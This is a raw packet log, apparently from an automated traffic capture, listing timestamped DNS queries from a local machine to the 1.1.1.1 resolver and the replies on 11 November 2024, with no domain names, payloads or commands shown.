                                                                                                                                                                                                            Nov 11, 2024 18:07:50.477267027 CET53530691.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.477451086 CET53589951.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.477555990 CET53598801.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.478918076 CET53622611.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.480854034 CET53607441.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.482379913 CET53604631.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.493205070 CET53514211.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.494329929 CET53493141.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.495349884 CET53508001.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.499265909 CET53559721.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.584433079 CET5904453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.590735912 CET5500753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.597263098 CET5591253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.597449064 CET5186653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.597687006 CET5445853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.602555990 CET6090753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.604652882 CET5637153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.604652882 CET6527053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.605470896 CET6201753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.606380939 CET5604053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.607198000 CET5559153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.608309984 CET53518661.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.609376907 CET5719153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.609460115 CET53544581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.609764099 CET6442153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.610735893 CET6465653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612013102 CET6372753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612371922 CET5367953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612509966 CET5875853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612859964 CET4927353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612956047 CET5531153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.613688946 CET5013953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.615025043 CET53620171.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.616487026 CET53609071.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.616517067 CET53560401.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.616537094 CET53590441.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.616697073 CET53555911.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.618156910 CET53559121.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.618979931 CET53571911.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.621589899 CET53536791.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.621726990 CET53550071.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.621738911 CET53637271.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.623079062 CET53587581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.624154091 CET53501391.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.636403084 CET53652701.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.637742043 CET53563711.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.640661955 CET53644211.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.641465902 CET53646561.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.643162012 CET53553111.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.643640995 CET53492731.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.664427996 CET5716853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.664993048 CET6529453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.667336941 CET6550953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.667813063 CET6265853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.668025017 CET5018753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.668553114 CET5701753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.668803930 CET5609253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.669148922 CET6225753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.669482946 CET5109153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.675443888 CET53652941.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.677750111 CET53560921.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.678008080 CET53501871.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.678841114 CET53622571.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.680474997 CET53510911.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.686487913 CET5413253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.698308945 CET53655091.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.698743105 CET5245453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.699145079 CET53626581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.700264931 CET53570171.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.703600883 CET5703853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.704046011 CET6039353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.704771996 CET5264353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.704962969 CET4944953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.714400053 CET53603931.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.714490891 CET53570381.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.714644909 CET53526431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.714896917 CET53494491.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.718524933 CET53541321.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.723022938 CET6163553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.730048895 CET53524541.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.734103918 CET53616351.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.734762907 CET5091953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.736766100 CET5864953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737031937 CET5810353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737163067 CET5220753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737251997 CET5291453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737354040 CET6369553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737468958 CET5740553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737673998 CET5714753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737867117 CET5090453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738080978 CET6198153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738286018 CET6180353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738430977 CET4965853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738815069 CET6295853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738847971 CET6245753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739042997 CET5297853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739053965 CET6549853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739233971 CET6155253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739844084 CET5328253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741147995 CET5556553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741261005 CET5538353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741435051 CET5443753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741893053 CET53509191.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744285107 CET6149453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744709015 CET5779653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744832993 CET5292453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744940996 CET6552353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745057106 CET5588353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745639086 CET6258553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745755911 CET5588553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745805979 CET53581031.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.747035027 CET53509041.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.747549057 CET53574051.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.747559071 CET53586491.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.747665882 CET53619811.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.748086929 CET53529141.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.748750925 CET53496581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.748830080 CET53529781.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.749941111 CET53532821.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.750673056 CET53624571.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.751141071 CET53555651.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.751152039 CET53553831.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.751692057 CET53544371.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.754714966 CET53614941.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.755249977 CET53577961.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.756154060 CET53529241.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.756791115 CET53625851.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.764777899 CET53558831.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.767831087 CET53522071.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.769329071 CET53571471.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.769448996 CET53571681.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.770052910 CET53636951.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.770064116 CET53654981.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.770072937 CET53615521.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.772631884 CET53618031.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.776436090 CET53655231.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.777905941 CET53558851.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.101494074 CET53629581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.374003887 CET5946153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.374716043 CET4945053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.375857115 CET5369053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.376441956 CET6225753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.385814905 CET53536901.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.386557102 CET53622571.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.387299061 CET53494501.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.406172991 CET53594611.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.418620110 CET5222253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.418859005 CET5370953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.425586939 CET6374853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.426131010 CET5806453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.427726030 CET6015953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.428865910 CET5550253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.429795027 CET53522221.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.429841995 CET53537091.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.430289030 CET5004953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.432332039 CET6329753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.434540987 CET5083553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.435194969 CET53637481.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.436234951 CET53580641.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.438990116 CET6000153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.439493895 CET5470853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.439718962 CET6099953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.441971064 CET5308153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.442141056 CET6292053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.444097042 CET5959153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.444459915 CET53632971.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.444701910 CET53508351.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.448477030 CET53555021.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.450906992 CET5335553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451344013 CET5302053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451513052 CET6095653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451710939 CET4929353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451796055 CET5048053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.452353001 CET6015553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.452811956 CET53609991.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.452828884 CET53629201.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.456082106 CET53595911.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.457989931 CET6129353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.458561897 CET6524353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.460681915 CET53601591.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.461407900 CET53500491.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.461671114 CET53533551.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.462121964 CET53492931.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.462150097 CET53504801.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.462971926 CET53609561.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.467171907 CET6240353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.467894077 CET53612931.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.468549967 CET5874853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.469482899 CET53652431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.470557928 CET53600011.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.470932007 CET53547081.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.472230911 CET53530811.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.475140095 CET5290353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.479032993 CET6408753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.479178905 CET53587481.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.480353117 CET6428453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.482302904 CET5085253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.483376980 CET53530201.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.484059095 CET53601551.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.489458084 CET6071953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.489788055 CET5995453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.491240978 CET5574653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.491647959 CET5160153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.492435932 CET53508521.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.498816967 CET53624031.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.499481916 CET53607191.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.501382113 CET53599541.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502266884 CET6238653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502456903 CET6026553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502609968 CET5016753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502763987 CET6269353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502952099 CET6327453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.503247023 CET6052753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.503408909 CET6100753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.503556013 CET5741353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.506751060 CET53529031.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.507807970 CET6471853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.507998943 CET5515953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.508450985 CET6153853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.508723021 CET5831853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.508903980 CET6458053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.509754896 CET5337053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.509891987 CET53640871.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.509910107 CET6134553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.512705088 CET5328753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.512715101 CET53501671.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.513051033 CET53602651.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.513071060 CET53605271.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.513398886 CET53574131.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.513421059 CET53610071.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.515227079 CET53642841.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.515342951 CET6150153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.515716076 CET5027053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.515945911 CET53551591.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.516474962 CET6416153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.516535044 CET5484153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.517194033 CET53645801.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.517618895 CET5338253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.518213987 CET53615381.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.518800974 CET5343953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.519192934 CET53583181.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.519465923 CET5665853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.519990921 CET53623861.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.520062923 CET53533701.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.520489931 CET5395453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.521280050 CET53632741.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.521716118 CET5036453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.522614956 CET5700053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.523525953 CET53557461.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.523602962 CET53532871.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.523674011 CET6041953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.524811983 CET53615011.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.524823904 CET53533821.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.525495052 CET53647181.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.526921034 CET53516011.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.527110100 CET53548411.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.527220964 CET53641611.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.529217005 CET53566581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.530689955 CET53539541.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.532367945 CET53503641.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.532766104 CET53570001.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.534748077 CET53626931.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.539753914 CET53613451.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.542587042 CET53534391.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.547832966 CET53502701.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.555064917 CET53604191.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.771601915 CET5688353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.771601915 CET5300553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.774729967 CET6153253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.780899048 CET5009153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.781465054 CET5723853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.790951967 CET53572381.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.794579029 CET53615321.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.798806906 CET53500911.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.800108910 CET6527853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.800837994 CET5844253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.801254034 CET53568831.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.803514957 CET53530051.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.809781075 CET6494053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.809906006 CET5985053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.810142994 CET6531153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.818547964 CET53649401.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.820451975 CET5761653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.829185963 CET5167153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.830184937 CET6459553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.831401110 CET53652781.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.831985950 CET53576161.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.832914114 CET53584421.1.1.1192.168.2.9
